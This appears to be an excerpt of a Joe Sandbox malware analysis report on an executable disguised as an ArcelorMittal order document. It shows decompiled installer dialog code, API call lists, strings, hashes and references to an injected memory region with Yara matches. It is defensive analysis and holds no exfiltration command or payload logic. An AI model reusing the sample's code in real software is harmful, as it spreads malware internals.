									_t195 =  *0x7a8a68;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x7a8a6c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x7a7a1c; // 0x9ae6de
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404A16(0x3ff, 0xfffffffb, E00404A2E(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x7a8a6c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x7a1f38);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x7a8aa0 = _t306;
					 *0x7a1f38 = GlobalAlloc(0x40,  *0x7a8a6c << 2);
					_t252 = LoadBitmapW( *0x7a8a40, 0x6e);
					 *0x7a1f2c =  *0x7a1f2c | 0xffffffff;
					_t313 = _t252;
					 *0x7a1f34 = SetWindowLongW(_v8, 0xfffffffc, E00405105);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f24 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f24);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406054(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004040F6(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004040F6(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x7a8a6c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x7a1f38 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x7a1f38 + _t316 * 4) = _t276;
									_t284 =  *( *0x7a1f38 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x7a8a6c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040412B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040412B(_v12);
								L91:
								return E0040415D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404b1c
0x00404b2d
0x00404b32
0x00404b3a
0x00404b40
0x00404b48
0x00404b56
0x00404b59
0x00404d7a
0x00404d81
0x00404d95
0x00404d83
0x00404d85
0x00404d88
0x00404d89
0x00404d90
0x00404d90
0x00404da1
0x00404daf
0x00404db2
0x00404dc8
0x00404e3d
0x00404e40
0x00404e42
0x00404e4c
0x00404e5a
0x00404e5a
0x00404e5c
0x00404e66
0x00404e6c
0x00404e6f
0x00404e72
0x00404e8d
0x00404e74
0x00404e7e
0x00404e7e
0x00404e72
0x00404e66
0x00000000
0x00404e40
0x00404dcd
0x00404dd8
0x00404ddd
0x00404de4
0x00404de9
0x00404ded
0x00404df8
0x00404df8
0x00404dfc
0x00404e00
0x00404e04
0x00404e17
0x00404e06
0x00404e06
0x00404e0d
0x00404e13
0x00404e0f
0x00404e0f
0x00404e0f
0x00404e0d
0x00404e1b
0x00404e1d
0x00404e30
0x00404e33
0x00404e36
0x00404e36
0x00404e00
0x00000000
0x00404ded
0x00404dcf
0x00404dd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404e90
0x00404e90
0x00404e97
0x00404f08
0x00404f10
0x00404f18
0x00404f18
0x00404f21
0x00404f23
0x00404f2a
0x00404f2d
0x00404f2d
0x00404f33
0x00404f3a
0x00404f3d
0x00404f3d
0x00404f43
0x00404f49
0x00404f4f
0x00404f4f
0x00404f5c
0x004050b2
0x004050b9
0x004050d6
0x004050dc
0x004050ee
0x004050ee
0x00000000
0x00404f62
0x00404f64
0x00404f69
0x00404f6e
0x00404f73
0x00404f75
0x00404f75
0x00404f76
0x00404f77
0x00404f79
0x00404f79
0x00404f81
0x00404fc2
0x00404fc4
0x00404fd4
0x00404fd7
0x00404fdc
0x00404fe3
0x00404fe6
0x00405088
0x0040508e
0x00405094
0x0040509c
0x004050ad
0x004050ad
0x00000000
0x0040509c
0x00404fec
0x00404fef
0x00404ff5
0x00404ffa
0x00404ffc
0x00404ffe
0x00405004
0x0040500b
0x00405010
0x00405017
0x0040501a
0x0040501a
0x00405021
0x0040502d
0x00405031
0x00405033
0x00405033
0x00405023
0x00405025
0x00405025
0x00405053
0x0040505f
0x0040506e
0x0040506e
0x00405070
0x00405073
0x0040507c
0x00000000
0x00404f83
0x00404f8e
0x00404f91
0x00404f96
0x00404f98
0x00404f9c
0x00404fac
0x00404fb6
0x00404fb8
0x00404fbb
0x00000000
0x00000000
0x00000000
0x00000000
0x00404f9e
0x00404f9e
0x00404fa4
0x00404fa6
0x00404fa6
0x00404fa7
0x00404fa8
0x00000000
0x00404f9e
0x00404f81
0x00404f5c
0x00404e9f
0x00000000
0x00404eb5
0x00404ebf
0x00404ec4
0x00000000
0x00000000
0x00404ed6
0x00404edb
0x00404ee7
0x00404ee7
0x00404ee9
0x00404ef8
0x00404efa
0x00404efe
0x00404f01
0x00000000
0x00404f01
0x00404e9f
0x00404b5f
0x00404b64
0x00404b6d
0x00404b74
0x00404b82
0x00404b8d
0x00404b93
0x00404ba1
0x00404bb5
0x00404bba
0x00404bc7
0x00404bcc
0x00404be2
0x00404bf3
0x00404c00
0x00404c00
0x00404c03
0x00404c09
0x00404c0b
0x00404c0e
0x00404c13
0x00404c18
0x00404c1a
0x00404c1a
0x00404c3a
0x00404c3a
0x00404c3c
0x00404c3d
0x00404c42
0x00404c45
0x00404c48
0x00404c4c
0x00404c51
0x00404c56
0x00404c5a
0x00404c5f
0x00404c64
0x00404c66
0x00404c6e
0x00404d39
0x00404d4c
0x00000000
0x00404c74
0x00404c77
0x00404c7a
0x00404c7d
0x00404c7d
0x00404c84
0x00404c8a
0x00404c8d
0x00404c93
0x00404c94
0x00404c99
0x00404ca2
0x00404ca9
0x00404cac
0x00404caf
0x00404cb2
0x00404cee
0x00404d17
0x00404cf0
0x00404cfd
0x00404cfd
0x00404cb4
0x00404cb7
0x00404cc6
0x00404cd0
0x00404cd8
0x00404cdf
0x00404ce7
0x00404ce7
0x00404cb2
0x00404d1d
0x00404d1e
0x00404d2a
0x00404d2a
0x00404d37
0x00404d52
0x00404d56
0x00404d73
0x00404d78
0x00000000
0x00404d58
0x00404d5d
0x00404d66
0x004050f0
0x00405102
0x00405102
0x00404d56
0x00000000
0x00404d37
0x00404c6e

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B25
GetDlgItem.USER32(?,00000408), ref: 00404B30
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7A
LoadBitmapW.USER32(0000006E), ref: 00404B8D
SetWindowLongW.USER32(?,000000FC,00405105), ref: 00404BA6
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBA
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCC
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE2
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEE
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C00
DeleteObject.GDI32(00000000), ref: 00404C03
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2E
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3A
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD0
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFB
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D0F
GetWindowLongW.USER32(?,000000F0), ref: 00404D3E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4C
ShowWindow.USER32(?,00000005), ref: 00404D5D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EBF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED4
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF8
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F18
ImageList_Destroy.COMCTL32(?), ref: 00404F2D
GlobalFree.KERNEL32(?), ref: 00404F3D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB6
SendMessageW.USER32(?,00001102,?,?), ref: 0040505F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506E
InvalidateRect.USER32(?,00000000,00000001), ref: 0040508E
ShowWindow.USER32(?,00000000), ref: 004050DC
GetDlgItem.USER32(?,000003FE), ref: 004050E7
ShowWindow.USER32(00000000), ref: 004050EE

Strings

N, xrefs: 00404D98
M, xrefs: 00404CB7
, xrefs: 004050C6

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 7e0d7925856d8dc2a293aec0a36156ab26fb8fad00dbeb743b55e37ef2f2f0d3
Instruction ID: d02e9a787b540977323fb19233601523635b60db84404d8275966fa362dc0732
Opcode Fuzzy Hash: 7e0d7925856d8dc2a293aec0a36156ab26fb8fad00dbeb743b55e37ef2f2f0d3
Instruction Fuzzy Hash: 81027EB0900209EFEB109F94DD85AAE7BB5FB85314F10813AF610BA2E1CB799D51CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404591 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404591(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f18; // 0x9ab874
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
				_t146 = ( *_t2 << 0xb) + 0x7a9000;
				_v12 =  *_t3;
				if(_a8 == 0x40b) {
					E0040575B(0x3fb, _t146);
					E004062C6(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040575B(0x3fb, _t146);
							if(E00405AEE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406032(0x79ff10, _t146);
							_t87 = E00406408(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406032(0x79ff10, _t146);
								_t89 = E00405A91(0x79ff10);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff10,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff10) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff10,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405A32(0x79ff10);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff10) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404A2E(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x7a7a1c; // 0x9ae6de
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A16(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff00);
									} else {
										E0040494D(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8ae4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404118(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f30 == _t158) {
									E00404526();
								}
								 *0x7a1f30 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f40;
							_v60 = E004048E7;
							_v56 = _t146;
							_v68 = E00406054(_t146, 0x7a1f40, _t167, 0x7a0718, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004059E6(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8a50 + 0x11c));
								if( *((intOrPtr*)( *0x7a8a50 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis") {
									E00406054(_t146, 0x7a1f40, _t167, 0, _t125);
									if(lstrcmpiW(0x7a69e0, 0x7a1f40) != 0) {
										lstrcatW(_t146, 0x7a69e0);
									}
								}
								 *0x7a1f30 =  *0x7a1f30 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405A5D(_t146) != 0 && E00405A91(_t146) == 0) {
						E004059E6(_t146);
					}
					 *0x7a7a18 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004040F6(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004040F6(_t167);
					E0040412B(_t166);
					_t138 = E00406408(6);
					if(_t138 == 0) {
						L53:
						return E0040415D(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404591
0x00404597
0x0040459d
0x004045a1
0x004045a4
0x004045aa
0x004045b8
0x004045bb
0x004045c3
0x004045c9
0x004045c9
0x004045d5
0x004045d8
0x00404646
0x0040464d
0x00404724
0x0040472b
0x0040473a
0x0040473a
0x0040473e
0x00404748
0x00404755
0x00404757
0x00404757
0x00404765
0x0040476c
0x00404773
0x00404776
0x004047b2
0x004047b4
0x004047ba
0x004047bf
0x004047c3
0x004047c5
0x004047c5
0x004047e1
0x00000000
0x004047e3
0x004047e6
0x004047f4
0x004047fa
0x004047fb
0x004047fe
0x00404801
0x00000000
0x00404801
0x00404778
0x0040477a
0x0040477e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404780
0x00404780
0x0040478d
0x00404792
0x00000000
0x00000000
0x00404796
0x00404798
0x00404798
0x004047a1
0x004047a3
0x004047a8
0x004047ab
0x004047b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004047b0
0x0040480d
0x00404817
0x0040481a
0x0040481d
0x00404824
0x00404824
0x00404826
0x00404826
0x0040482b
0x0040482d
0x00404835
0x0040483c
0x0040483e
0x00404849
0x00404849
0x0040483e
0x00404850
0x00404859
0x00404863
0x0040486b
0x00404886
0x0040486d
0x00404876
0x00404876
0x0040486b
0x0040488b
0x00404890
0x00404895
0x0040489e
0x0040489e
0x004048a7
0x004048a9
0x004048a9
0x004048b5
0x004048bd
0x004048c7
0x004048c7
0x004048cc
0x00000000
0x004048cc
0x00404776
0x0040472d
0x00404734
0x00000000
0x00000000
0x00000000
0x00404734
0x00404653
0x0040465c
0x00404676
0x0040467b
0x00404685
0x0040468c
0x00404698
0x0040469b
0x0040469e
0x004046a5
0x004046ad
0x004046b0
0x004046b4
0x004046bb
0x004046c3
0x0040471d
0x004046c5
0x004046c6
0x004046cd
0x004046d7
0x004046df
0x004046ec
0x00404700
0x00404704
0x00404704
0x00404700
0x00404709
0x00404716
0x00404716
0x004046c3
0x00000000
0x0040467b
0x00404669
0x00000000
0x00000000
0x0040466f
0x00000000
0x004045da
0x004045e7
0x004045f0
0x004045fd
0x004045fd
0x00404604
0x0040460a
0x00404613
0x00404616
0x00404619
0x00404621
0x00404624
0x00404627
0x0040462d
0x00404634
0x0040463b
0x004048d2
0x004048e4
0x00404641
0x00404644
0x00000000
0x00404644
0x0040463b

APIs

GetDlgItem.USER32(?,000003FB), ref: 004045E0
SetWindowTextW.USER32(00000000,-007A9000), ref: 0040460A
SHBrowseForFolderW.SHELL32(?), ref: 004046BB
CoTaskMemFree.OLE32(00000000), ref: 004046C6
lstrcmpiW.KERNEL32(Call,007A1F40,00000000,?,-007A9000), ref: 004046F8
lstrcatW.KERNEL32(-007A9000,Call), ref: 00404704
SetDlgItemTextW.USER32(?,000003FB,-007A9000), ref: 00404716

Part of subcall function 0040575B: GetDlgItemTextW.USER32(?,?,00000400,0040474D), ref: 0040576E

Part of subcall function 004062C6: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00406329
Part of subcall function 004062C6: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 00406338
Part of subcall function 004062C6: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 0040633D
Part of subcall function 004062C6: CharPrevW.USER32(0040A300,0040A300,762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00406350

GetDiskFreeSpaceW.KERNEL32(0079FF10,?,?,0000040F,?,0079FF10,0079FF10,-007A9000,00000001,0079FF10,-007A9000,-007A9000,000003FB,-007A9000), ref: 004047D9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047F4

Part of subcall function 0040494D: lstrlenW.KERNEL32(007A1F40,007A1F40,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 004049EE
Part of subcall function 0040494D: wsprintfW.USER32 ref: 004049F7
Part of subcall function 0040494D: SetDlgItemTextW.USER32(?,007A1F40), ref: 00404A0A

Strings

A, xrefs: 004046B4
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis, xrefs: 004046E1
Call, xrefs: 004046F2, 004046F7, 00404702

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$Call
API String ID: 2624150263-4080112807
Opcode ID: 23919bb9406077de8126e392a934b699bf4a802904ea86574e2f4141f427e215
Instruction ID: 30da9b98090b1fe5a0259897bb92749c5f748b87693770e47a0c546725bed2a9
Opcode Fuzzy Hash: 23919bb9406077de8126e392a934b699bf4a802904ea86574e2f4141f427e215
Instruction Fuzzy Hash: 3FA19FB1900208ABDB11EFA5CD81AAFB7B8EF85354F10843BF601B62D1D77C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 02FAF1DA Relevance: 4.4, Strings: 3, Instructions: 620COMMON

Download Yara Rule

Strings

g0n4, xrefs: 02FAF2C8
-ZUM, xrefs: 02FAF309
7ZjN, xrefs: 02FAF8E6

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: -ZUM$7ZjN$g0n4
API String ID: 2706961497-2675036573
Opcode ID: 55176bdc244dc38279fa61e82ac8c430289cddbeb847f6e949668680ec13170a
Instruction ID: 53762e59d5abf27a59f489bd2c5fe2fa911b5fc145e2cbb3395b32d1add85ec7
Opcode Fuzzy Hash: 55176bdc244dc38279fa61e82ac8c430289cddbeb847f6e949668680ec13170a
Instruction Fuzzy Hash: 2E424B71A083C58FDB25CF38C9A87D67BE25F52360F498259CC998F296D3358546C712

Uniqueness

Uniqueness Score: -1.00%

Function 02FA646B Relevance: 2.8, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

3T1\, xrefs: 02FA647A
(g, xrefs: 02FA66B6

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID: (g$3T1\
API String ID: 0-3267231820
Opcode ID: afe01cfb0668718a78019c6838ea768f2e0b9688d983b2aa50a55fcb76d7d5c8
Instruction ID: 952612780e8ebe03de9297c241ba14f8854d735afd966f8c8da4c51fffa19dc6
Opcode Fuzzy Hash: afe01cfb0668718a78019c6838ea768f2e0b9688d983b2aa50a55fcb76d7d5c8
Instruction Fuzzy Hash: D4A14471A043499FEB308E388D657EB77A7AF95390F9A852EDC89D7214C3318981CB12

Uniqueness

Uniqueness Score: -1.00%

Function 02FA606B Relevance: 2.6, Strings: 2, Instructions: 91COMMON

Download Yara Rule

Strings

`, xrefs: 02FA615C
S, xrefs: 02FA617D

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

